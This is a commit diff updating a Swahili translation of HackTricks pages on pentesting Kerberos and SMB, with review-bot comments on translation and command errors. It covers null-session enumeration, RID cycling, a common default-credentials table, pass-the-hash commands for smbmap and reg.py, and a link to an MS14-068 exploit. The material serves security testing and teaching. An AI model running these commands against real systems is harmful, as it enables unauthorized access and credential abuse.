Translated ['src/network-services-pentesting/pentesting-smb/README.md',

This commit is contained in:
Translator 2025-09-29 09:39:07 +00:00
parent 12175d56e6
commit 4da68715d1
4 changed files with 431 additions and 304 deletions

View File

@ -2,20 +2,57 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Taarifa za Msingi
**Kerberos** inafanya kazi kwa kanuni ambapo inathibitisha watumiaji bila moja kwa moja kusimamia ufikiaji wao kwa rasilimali. Hii ni tofauti muhimu kwa sababu inasisitiza jukumu la itifaki katika mifumo ya usalama.
**Kerberos** inafanya kazi kwa kanuni inayothibitisha watumiaji bila kusimamia moja kwa moja ufikiaji wao wa rasilimali. Hii ni tofauti muhimu kwa sababu inaonyesha nafasi ya itifaki katika mifumo ya usalama.
Katika mazingira kama **Active Directory**, **Kerberos** ni muhimu katika kuanzisha utambulisho wa watumiaji kwa kuthibitisha nywila zao za siri. Mchakato huu unahakikisha kwamba utambulisho wa kila mtumiaji unathibitishwa kabla ya kuingiliana na rasilimali za mtandao. Hata hivyo, **Kerberos** haipanui kazi zake ili kutathmini au kutekeleza ruhusa ambazo mtumiaji anazo juu ya rasilimali au huduma maalum. Badala yake, inatoa njia salama ya kuthibitisha watumiaji, ambayo ni hatua muhimu ya kwanza katika mchakato wa usalama.
Katika mazingira kama **Active Directory**, **Kerberos** ina jukumu muhimu katika kuthibitisha utambulisho wa watumiaji kwa kudhibitisha nywila zao za siri. Mchakato huu huhakikisha kuwa utambulisho wa kila mtumiaji unathibitishwa kabla ya kuingiliana na rasilimali za mtandao. Hata hivyo, **Kerberos** haigusi utendaji wake ili kutathmini au kutekeleza ruhusa ambazo mtumiaji ana kwa rasilimali au huduma maalum. Badala yake, inatoa njia salama ya kuthibitisha watumiaji, ambayo ni hatua muhimu ya kwanza katika mchakato wa usalama.
Baada ya uthibitisho na **Kerberos**, mchakato wa kufanya maamuzi kuhusu ufikiaji wa rasilimali unakabidhiwa kwa huduma binafsi ndani ya mtandao. Huduma hizi zinawajibika kutathmini haki na ruhusa za mtumiaji aliyethibitishwa, kulingana na taarifa iliyotolewa na **Kerberos** kuhusu haki za mtumiaji. Muundo huu unaruhusu kutenganisha masuala kati ya kuthibitisha utambulisho wa watumiaji na kusimamia haki zao za ufikiaji, na kuwezesha njia yenye kubadilika na salama ya usimamizi wa rasilimali katika mitandao iliyosambazwa.
Baada ya uthibitisho na **Kerberos**, mchakato wa uamuzi kuhusu ufikiaji wa rasilimali unaachwa kwa huduma za mtu binafsi ndani ya mtandao. Huduma hizi ndizo zinazonajibika kutathmini haki na ruhusa za mtumiaji aliyethibitishwa, kwa msingi wa taarifa zilizotolewa na **Kerberos** kuhusu haki za mtumiaji. Muundo huu unaruhusu utofauti wa majukumu kati ya kuthibitisha utambulisho wa watumiaji na kusimamia haki zao za ufikiaji, na hivyo kuwezesha njia ya kusimamia rasilimali kuwa yenye kubadilika zaidi na salama katika mitandao iliyogatuliwa.
**Default Port:** 88/tcp/udp
**Bandari ya Chaguo-msingi:** 88/tcp/udp
```
PORT STATE SERVICE
88/tcp open kerberos-sec
```
### **Ili kujifunza jinsi ya kutumia Kerberos unapaswa kusoma chapisho kuhusu** [**Active Directory**](../../windows-hardening/active-directory-methodology/index.html)**.**
### **Ili kujifunza jinsi ya kutumia vibaya Kerberos unapaswa kusoma chapisho kuhusu** [**Active Directory**](../../windows-hardening/active-directory-methodology/index.html)**.**
## Mazingira yenye Kerberos pekee: maandalizi ya mteja na utatuzi wa matatizo
Wakati NTLM imezimwa kwenye huduma za domain (SMB/WinRM/n.k.), lazima uthibitike kwa Kerberos. Mambo ya kuzingatia na mtiririko wa kazi unaofanya kazi:
- Ulinganifu wa saa ni wa lazima. Ikiwa saa ya mwenyeji wako imepishana kwa zaidi ya dakika chache utaona `KRB_AP_ERR_SKEW` na uthibitisho wote wa Kerberos utashindwa. Linganisha dhidi ya DC:
```bash
# quick one-shot sync (requires sudo)
sudo ntpdate <dc.fqdn> || sudo chronyd -q 'server <dc.fqdn> iburst'
```
- Tengeneza krb5.conf halali kwa realm/domain lengwa. `netexec` (CME fork) inaweza kutoa moja kwa ajili yako wakati wa kujaribu SMB:
```bash
# Generate krb5.conf and install it
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
```
- Pata TGT na uhakikishe ccache:
```bash
kinit <user>
klist
```
- Tumia Kerberos na zana za SMB (hakuna nywila zinatumwa, inatumia ccache yako):
```bash
# netexec / CME
netexec smb <dc.fqdn> -k # lists shares, runs modules using Kerberos
# impacket examples also support -k / --no-pass to use the ccache
smbclient --kerberos //<dc.fqdn>/IPC$
```
- GSSAPI SSH kuingia mara moja (OpenSSH kwa Windows OpenSSH server):
```bash
# Ensure krb5.conf is correct and you have a TGT (kinit)
# Use the FQDN that matches the host SPN. Wrong names cause: "Server not found in Kerberos database"
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
```
Tips:
- Hakikisha `/etc/hosts` inatambua (resolves) FQDN kamili utakayofikia kwa SSH/SMB, na kwamba iko kabla ya rekodi za domain zisizo na jina la host (bare domain entries) ikiwa unabadilisha DNS. SPN mismatches husababisha GSSAPI kuvunjika.
- Ikiwa NTLM imezimwa kwenye SMB unaweza kuona `STATUS_NOT_SUPPORTED` wakati wa majaribio ya NTLM; ongeza `-k` kulazimisha Kerberos.
## Zaidi
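Review bot: in the "Tumia Kerberos na zana za SMB" block, `netexec smb <dc.fqdn> -k` is commented as running with the ticket cache, but `-k` on its own only selects Kerberos; the NetExec option documented for authenticating from `KRB5CCNAME` is `--use-kcache`, so suggest `netexec smb <dc.fqdn> --use-kcache` or at least mention that flag in the comment. Minor: the "Tips:" label stayed in English while the rest of the new section is Swahili ("Vidokezo:").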
@ -25,16 +62,23 @@ PORT STATE SERVICE
### MS14-068
Kasoro ya MS14-068 inaruhusu mshambuliaji kubadilisha tokeni ya kuingia ya Kerberos ya mtumiaji halali ili kudai kwa uwongo mamlaka ya juu, kama vile kuwa Msimamizi wa Domain. Dai hili la uongo linathibitishwa kwa makosa na Kituo cha Domain, likiwezesha ufikiaji usioidhinishwa wa rasilimali za mtandao katika msitu wa Active Directory.
Hitilafu ya MS14-068 inamruhusu mdhambi kuharibu tokeni ya kuingia ya Kerberos ya mtumiaji halali ili kudai kwa udanganyifu vibali vya juu, kama vile kuwa Domain Admin. Dai hili bandia linathibitishwa kwa makosa na Domain Controller, ikiruhusu upatikanaji usioidhinishwa wa rasilimali za mtandao katika msitu wa Active Directory.
{{#ref}}
https://adsecurity.org/?p=541
{{#endref}}
Mifano mingine: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
## HackTricks Amri za Otomatiki
## Marejeo
- [NetExec (CME) wiki Kerberos and krb5.conf generation](https://www.netexec.wiki/)
- [OpenSSH GSSAPIAuthentication](https://man.openbsd.org/ssh_config#GSSAPIAuthentication)
- [MIT Kerberos Using Kerberos on UNIX](https://web.mit.edu/kerberos/krb5-1.12/doc/user/user_config.html)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
## Amri za Kiotomatiki za HackTricks
```
Protocol_Name: Kerberos #Protocol Abbreviation if there is one.
Port_Number: 88 #Comma separated if there is more than one.
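Review bot: "Other exploits:" replaces the Swahili "Mifano mingine:" with English, a regression for a translation commit. The old wording read as "other examples", so rewording is justified, but it should stay Swahili, e.g. "Exploits zingine:". The new "Marejeo" list and the renamed "Amri za Kiotomatiki za HackTricks" heading look fine.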

View File

@ -4,43 +4,43 @@
## **Port 139**
The _**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya mtandao wa eneo la ndani (LAN) kuingiliana na vifaa vya mtandao na **kusaidia usafirishaji wa data kwenye mtandao**. Utambuzi na eneo la programu zinazofanya kazi katika mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa hadi herufi 16 kwa urefu na mara nyingi yanatofautiana na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (inayofanya kazi kama mteja) inatoa amri ya "kuita" programu nyingine (inayofanya kazi kama seva) kwa kutumia **TCP Port 139**.
The _**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya local area network (LAN) kuingiliana na vifaa vya mtandao na **kurahisisha uhamishaji wa data kupitia mtandao**. Utambulisho na eneo la programu zinazoendesha kwenye mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa na hadi herufi 16 kwa urefu na mara nyingi ni tofauti na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili huanzishwa wakati programu moja (inayoitumikia kama client) inatoa amri ya "call" kwa programu nyingine (inayoitumikia kama server) ikitumia **TCP Port 139**.
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445
Kiufundi, Port 139 inarejelewa kama NBT over IP, huku Port 445 ikitambulika kama SMB over IP. Kifupi **SMB** kinamaanisha **Server Message Blocks**, ambayo pia kisasa inajulikana kama **Common Internet File System (CIFS)**. Kama itifaki ya mtandao katika safu ya programu, SMB/CIFS hutumiwa hasa kuwezesha upatikanaji wa pamoja wa faili, printa, bandari za serial, na kurahisisha aina mbalimbali za mawasiliano kati ya nodes kwenye mtandao.
Kiteknikali, Port 139 inatajwa kama NBT over IP, wakati Port 445 inatambulika kama SMB over IP. Herufi fupi **SMB** inasimama kwa **Server Message Blocks**, ambayo pia kwa sasa inajulikana kama **Common Internet File System (CIFS)**. Kama itifaki ya tabaka la programu kwenye mtandao, SMB/CIFS hutumika hasa kuwezesha upatikanaji wa pamoja wa faili, printers, serial ports, na kurahisisha aina mbalimbali za mawasiliano kati ya nodes kwenye mtandao.
Kwa mfano, katika muktadha wa Windows, inaelezwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa hitaji la NetBIOS juu ya TCP/IP, kwa kutumia Port 445. Kinyume chake, kwenye mifumo tofauti, matumizi ya Port 139 yanaonekana, ikionyesha kwamba SMB inatekelezwa kwa kushirikiana na NetBIOS juu ya TCP/IP.
Kwa mfano, katika muktadha wa Windows, inabainishwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa haja ya NetBIOS over TCP/IP, kwa kutumia port 445. Kwa upande mwingine, kwenye mifumo mingine, matumizi ya port 139 yanaonekana, ikionyesha kwamba SMB inatekelezwa sambamba na NetBIOS over TCP/IP.
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
The **Server Message Block (SMB)** protocol, operating in a **client-server** model, imeundwa kudhibiti **ufikiaji wa faili**, direktori, na rasilimali nyingine za mtandao kama printers na routers. Imetumika hasa ndani ya mfumo wa uendeshaji wa **Windows**, SMB inahakikisha utangamano wa nyuma, ikiruhusu vifaa vyenye matoleo mapya ya mfumo wa Microsoft kuingiliana bila tatizo na vilivyo kwenye matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu huru, kuruhusu utekelezaji wa SMB kwenye mifumo ya **Linux** na **Unix**, na hivyo kuwezesha mawasiliano ya cross-platform kupitia SMB.
Protokoli ya **Server Message Block (SMB)**, inayofanya kazi kwa mfano wa **client-server**, imeundwa kudhibiti **ufikiaji wa faili**, saraka, na rasilimali nyingine za mtandao kama printa na router. Kimsingi hutumika ndani ya mfululizo wa mfumo wa uendeshaji **Windows**, SMB hutoa uthabiti wa kurudi nyuma, ikiruhusu vifaa vyenye matoleo mapya ya mfumo wa uendeshaji wa **Microsoft** kuwasiliana kwa urahisi na vinavyoendesha matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu ya bure, likiruhusu utekelezaji wa SMB kwenye mifumo ya **Linux** na **Unix**, na hivyo kuwezesha mawasiliano ya kuvuka-platform kupitia SMB.
Shares, zinazoonyesha **arbitrary parts of the local file system**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa hierarchy uonekane kwa mteja kwa namna inayokuwa kwa sehemu **independent** na muundo halisi wa server. The **Access Control Lists (ACLs)**, ambazo zinafafanua **access rights**, zinaruhusu **fine-grained control** juu ya ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kutolewa kwa watumiaji binafsi au vikundi, kulingana na shares, na ni tofauti na ruhusa za ndani zilizowekwa kwenye server.
Shares, zinazoonyesha **sehemu yoyote ya mfumo wa faili wa eneo**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa saraka uonekane kwa mteja kwa sehemu **huru** kutoka muundo halisi wa server. **Access Control Lists (ACLs)**, ambazo zinafafanua **haki za ufikiaji**, zinaruhusu **udhibiti wa undani** wa ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kupewa watumiaji binafsi au makundi, kulingana na shares, na ni tofauti na ruhusa za eneo zilizoanzishwa kwenye server.
### IPC$ Share
Ufikiaji wa share ya IPC$ unaweza kupatikana kupitia anonymous null session, kuruhusu mwingiliano na huduma zinazofunguliwa kupitia named pipes. Utility ya `enum4linux` ni muhimu kwa madhumuni haya. Ikiotumika ipasavyo, inaruhusu upokezi wa:
Ufikiaji wa IPC$ share unaweza kupatikana kupitia anonymous null session, ikiruhusu mwingiliano na huduma zilizoonyeshwa kupitia named pipes. Zana ya `enum4linux` ni muhimu kwa lengo hili. Ikiotumika kwa usahihi, inaruhusu kupata:
- Taarifa kuhusu mfumo wa uendeshaji
- Maelezo juu ya parent domain
- Orodha ya watumiaji na vikundi vya ndani
- Taarifa juu ya SMB shares zinazopatikana
- Maelezo kuhusu mfumo wa uendeshaji
- Maelezo kuhusu domain ya mzazi
- Orodha ya watumiaji na makundi wa ndani
- Taarifa kuhusu SMB shares zinazopatikana
- Sera ya usalama ya mfumo inayotekelezwa
Uwezo huu ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini nafasi ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` hutoa mtazamo kamili wa mazingira ya SMB ya mfumo lengwa, jambo muhimu kwa kubaini udhaifu unaoweza kuwepo na kuhakikisha kwamba huduma za SMB zimetunzwa ipasavyo.
Utendaji huu ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini hali ya usalama ya huduma za SMB kwenye mtandao. `enum4linux` huwapa mtazamo kamilifu wa mazingira ya SMB ya mfumo lengwa, jambo la msingi kwa kubaini udhaifu unaoweza kutumika na kuhakikisha kuwa huduma za SMB zimeshika usalama ipasavyo.
```bash
enum4linux -a target_ip
```
Amri hapo juu ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya full enumeration dhidi ya target iliyobainishwa kama `target_ip`.
The above command is an example of how `enum4linux` might be used to perform a full enumeration against a target specified by `target_ip`.
## NTLM ni nini
Ikiwa haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana, ambapo umeelezewa **jinsi protokoli hii inavyofanya kazi na jinsi unavyoweza kuitumia kwa faida:**
Ikiwa haujui NTLM ni nini au unataka kuelewa jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** wa kuvutia, unaoelezea **jinsi protokoli hii inavyofanya kazi na jinsi unavyoweza kuitumia kwa faida:**
{{#ref}}
../../windows-hardening/ntlm/
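Review bot: "The above command is an example of how `enum4linux` might be used to perform a full enumeration..." replaces the Swahili sentence with English; keep "Amri hapo juu ni mfano wa jinsi `enum4linux` inaweza kutumika...". Also "Ikiotumika" in the IPC$ paragraph is a typo carried over from the old line; it should be "Ikitumika".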
@ -48,16 +48,16 @@ Ikiwa haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya ku
## **Server Enumeration**
### **Scan** mtandao kutafuta hosts:
### **Scan** a network searching for hosts:
```bash
nbtscan -r 192.168.0.1/24
```
### Toleo la seva la SMB
### Toleo la server la SMB
Ili kutafuta exploits zinazowezekana kwa toleo la SMB ni muhimu kujua toleo linayotumika. Ikiwa taarifa hii haionekani katika zana nyingine zinazotumika, unaweza:
Ili kutafuta exploits zinazowezekana kwa toleo la SMB, ni muhimu kujua ni toleo gani linatumika. Ikiwa taarifa hii haitokei kwenye zana nyingine zinazotumika, unaweza:
- Tumia **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**`
- Au skripti hii:
- Au script hii:
```bash
#!/bin/sh
#Author: rewardone
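Review bot: "### **Scan** a network searching for hosts:" reverts the heading to English; keep "### **Scan** mtandao kutafuta hosts:". Unchanged context worth fixing while here: `**auxiliary/scanner/smb/smb_version**` is wrapped in backticks, so the asterisks render literally; use either bold or a code span, not both.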
@ -74,28 +74,28 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **Utafutaji wa exploit**
### **Tafuta exploit**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **Vinavyowezekana** Vyeti
### **Inawezekana** Credentials
| **Jina la Mtumiaji(s)** | **Manenosiri ya kawaida** |
| ----------------------- | --------------------------------------- |
| _(bure)_ | _(bure)_ |
| guest | _(bure)_ |
| Administrator, admin | _(bure)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
| **Username(s)** | **Common passwords** |
| -------------------- | ----------------------------------------- |
| _(blank)_ | _(blank)_ |
| guest | _(blank)_ |
| Administrator, admin | _(blank)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
### Brute Force
- [**SMB Brute Force**](../../generic-hacking/brute-force.md#smb)
### Taarifa za Mazingira ya SMB
### Taarifa za Mazingira za SMB
### Pata Taarifa
```bash
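Review bot: the credentials table is switched back to English (header "Username(s)" / "Common passwords", cells "_(blank)_"). The old "_(bure)_" was a mistranslation ("bure" means free of charge, not blank), so the retreat is understandable, but for a Swahili page the fix is "_(tupu)_" while keeping the Swahili header ("Jina la Mtumiaji" / "Manenosiri ya kawaida"). The heading "### **Inawezekana** Credentials" also mixes languages; "### Credentials **zinazowezekana**" reads more naturally.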
@ -119,7 +119,7 @@ rpcclient -U "username%passwd" <IP> #With creds
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### Orodhesha Watumiaji, Vikundi & Watumiaji Waliyeingia
### Orodhesha Watumiaji, Makundi & Watumiaji Walioingia
Taarifa hizi zinapaswa tayari kuwa zimekusanywa na enum4linux na enum4linux-ng
```bash
@ -139,7 +139,7 @@ enumdomgroups
```bash
lookupsid.py -no-pass hostname.local
```
Oneliner
Mstari mmoja
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
@ -149,28 +149,28 @@ use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **Kuorodhesha LSARPC and SAMR rpcclient**
### **Kuorodhesha LSARPC na SAMR rpcclient**
{{#ref}}
rpcclient-enumeration.md
{{#endref}}
### GUI connection from linux
### Muunganisho wa GUI kutoka linux
#### Katika terminal:
`xdg-open smb://cascade.htb/`
#### Katika file browser window (nautilus, thunar, etc)
#### Katika dirisha la kivinjari cha faili (nautilus, thunar, n.k)
`smb://friendzone.htb/general/`
## Uorodhesha wa Folda Zilizoshirikiwa
## Kuorodhesha Folda Zilizoshirikiwa
### Orodhesha folda zilizoshirikiwa
Inashauriwa kila wakati kuangalia kama unaweza kupata chochote; ikiwa huna credentials, jaribu kutumia **null** **credentials/guest user**.
Kila mara inashauriwa kuangalia kama unaweza kupata chochote; kama huna credentials jaribu kutumia **null** **credentials/guest user**.
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
@ -196,11 +196,9 @@ smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **Orodhesha kwa mikono windows shares na kujiunga nazo**
### **Orodhesha kwa mkono windows shares na kuziunganisha**
Inawezekana kwamba umezuiwa kuonyesha shares zozote za mashine mwenyeji, na unapojaribu kuziorodhesha inaonekana kama hakuna shares za kuunganishwa nazo. Kwa hivyo inaweza kufaa kujaribu kwa muda mfupi kuunganishwa kwa mikono kwenye share.
Ili kuorodhesha shares kwa mikono unaweza kutaka kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, unapotumia valid session (mfano null session or valid credentials). Hii inaweza kuonyesha ikiwa share ipo na wewe huna ufikiaji wake, au share haipo kabisa.
Inawezekana umezuiliwa kuonyesha shares yoyote za mashine mwenyeji, na unapojaribu kuorodhesha zinaonekana kana kwamba hakuna shares zozote za kuunganishwa. Hivyo, inaweza kuwa vyema kujaribu kwa mkono kuungana kwenye share. Ili kuorodhesha shares kwa mkono, unaweza kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, ukiwa unatumia kikao halali (kwa mfano null session au valid credentials). Haya yanaweza kuashiria ikiwa share ipo na wewe huna ruhusa ya kuipata, au share haipo kabisa.
Common share names for windows targets are
@ -213,9 +211,9 @@ Common share names for windows targets are
- SYSVOL
- NETLOGON
(Majina ya kawaida ya shares kutoka _**Network Security Assessment 3rd edition**_)
(Common share names from _**Network Security Assessment 3rd edition**_)
Unaweza kujaribu kuunganishwa nazo kwa kutumia amri ifuatayo
Unaweza kujaribu kuungana nazo kwa kutumia amri ifuatayo
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
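Review bot: "(Common share names from _**Network Security Assessment 3rd edition**_)" replaces the Swahili attribution with English; keep "(Majina ya kawaida ya shares kutoka ...)". The preceding context line "Common share names for windows targets are" is still English as well, so both could be translated in the same pass.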
@ -239,10 +237,10 @@ done
```
mifano
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Orodhesha shares kutoka Windows / bila zana za mtu wa tatu**
### **Orodhesha shares kutoka Windows / bila zana za wahusika wa tatu**
PowerShell
```bash
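Review bot: the two example lines now use `\\192.168.0.24\\im_clearly_not_here` (two leading backslashes) where the old lines and the unchanged `smbclient -U '%' -N \\\\<IP>\\<SHARE>` command use four. In an unquoted bash argument each `\\` collapses to a single `\`, so the new form reaches smbclient as `\192.168.0.24\im_clearly_not_here` instead of the UNC path `\\192.168.0.24\im_clearly_not_here`; restore the four backslashes (or quote the argument) so the examples match the command they illustrate. Also "mifano" at the start of a line should be capitalized.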
@ -254,30 +252,30 @@ get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
Konsoli ya CMD
konsoli ya CMD
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
MMC Snap-in (ya grafiki)
MMC Snap-in (grafiki)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (graphical), ingiza `\\<ip>\` ili kuona shares zisizofichwa zinazopatikana.
explorer.exe (graphical), ingiza `\\<ip>\` ili kuona non-hidden shares zinazopatikana.
### Unganisha shared folder
### Unganisha folda iliyoshirikiwa
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **Pakua mafaili**
Soma sehemu zilizopita ili ujifunze jinsi ya kuunganishwa kwa kutumia credentials/Pass-the-Hash.
Soma sehemu zilizopita ili ujifunze jinsi ya kuungana kwa kutumia credentials/Pass-the-Hash.
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
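Review bot: "konsoli ya CMD" lowercases the first word of a standalone label; keep "Konsoli ya CMD" to match "PowerShell" and "MMC Snap-in" on the neighbouring lines.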
@ -292,16 +290,16 @@ smbclient //<IP>/<share>
> mget *
#Download everything to current directory
```
Commands:
Amri:
- mask: inabainisha mask inayotumika kuchuja faili ndani ya saraka (kwa mfano "" kwa faili zote)
- recurse: hubadilisha recursion kuwa imewezeshwa (chaguo-msingi: imezimwa)
- prompt: hugeuza kuulizwa kwa majina ya faili (chaguo-msingi: imewezeshwa)
- mget: kunakili faili zote zinazolingana na mask kutoka kwenye host kwenda kwenye client machine
- mask: inaelezea mask ambayo inatumiwa kuchuja faili ndani ya saraka (mfano: "" kwa faili zote)
- recurse: hugeuza recursion kuwa on (default: off)
- prompt: huzimisha kuuliza majina ya faili (default: on)
- mget: inakopi faili zote zinazolingana na mask kutoka host hadi client machine
(_Taarifa kutoka kwenye manpage ya smbclient_)
### Utafutaji wa Folda Zinazoshirikiwa za Domain
### Utafutaji wa Folda Zilizoshirikiwa za Domain
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
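Review bot: the new "prompt" bullet says it "huzimisha" (turns off) file-name prompting, but smbclient's `prompt` command toggles prompting, which the old wording "hugeuza" captured; the "default: on" part is correct either way. The new bullets also reintroduce English "on/off" and "default" where the old lines had "imewezeshwa/imezimwa" and "chaguo-msingi"; keep the Swahili terms.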
@ -313,15 +311,15 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
Chini ya shares, zinazovutia hasa ni mafaili yanayoitwa **`Registry.xml`**, kwa kuwa zinaweza kuwa na **passwords** za watumiaji waliowekwa na **autologon** kupitia **Group Policy**. Pia mafaili ya **`web.config`** yanaweza kuwa na **credentials**.
Kinachovutia hasa kutoka shares ni faili zinazoitwa **`Registry.xml`**, kwani zinaweza **kuwa na passwords** za watumiaji waliowekwa na **autologon** kupitia Group Policy. Au faili za **`web.config`** kwa kuwa zina credentials.
> [!TIP]
> The **SYSVOL share** inasomeka na watumiaji wote waliothibitishwa kwenye domain. Huko unaweza **find** batch tofauti, VBScript, na PowerShell **scripts**.\
> Unapaswa **check** **scripts** zilizomo ndani yake kwani unaweza **find** taarifa nyeti kama **passwords**.
> The **SYSVOL share** inaweza **kusomwa** na watumiaji wote waliothibitishwa kwenye domain. Huko unaweza **kupata** aina nyingi za batch, VBScript, na PowerShell **scripts**.\
> Unapaswa **kuangalia** **scripts** zilizo ndani yake kwani unaweza **kupata** taarifa nyeti kama **passwords**.
## Soma Registry
## Read Registry
Unaweza kuwa na uwezo wa **read the registry** kwa kutumia baadhi ya credentials ulizogundua. Impacket **`reg.py`** inakuwezesha kujaribu:
Unaweza **read the registry** kwa kutumia credentials ulizozigundua. Impacket **`reg.py`** inakuwezesha kujaribu:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
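Review bot: "## Read Registry" replaces the Swahili heading "## Soma Registry" with English; keep the Swahili. In the sentence below, "read the registry" is untranslated in both the old and the new line ("kusoma registry").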
@ -329,35 +327,49 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87
```
## Post Exploitation
Usanidi wa **chaguo-msingi** wa seva ya **Samba** kwa kawaida upo katika `/etc/samba/smb.conf` na unaweza kuwa na baadhi ya **usanidi hatari**:
Mipangilio ya chaguo-msingi ya seva ya **Samba** kwa kawaida iko katika `/etc/samba/smb.conf` na inaweza kuwa na **mipangilio hatari**:
| **Mipangilio** | **Maelezo** |
| **Setting** | **Description** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Kuruhusu kuorodhesha shares zinazopatikana? |
| `read only = no` | Kuzuia uundaji na uhariri wa faili? |
| `writable = yes` | Kuruhusu watumiaji kuunda na kuhariri faili? |
| `guest ok = yes` | Kuruhusu kuunganishwa na huduma bila kutumia nenosiri? |
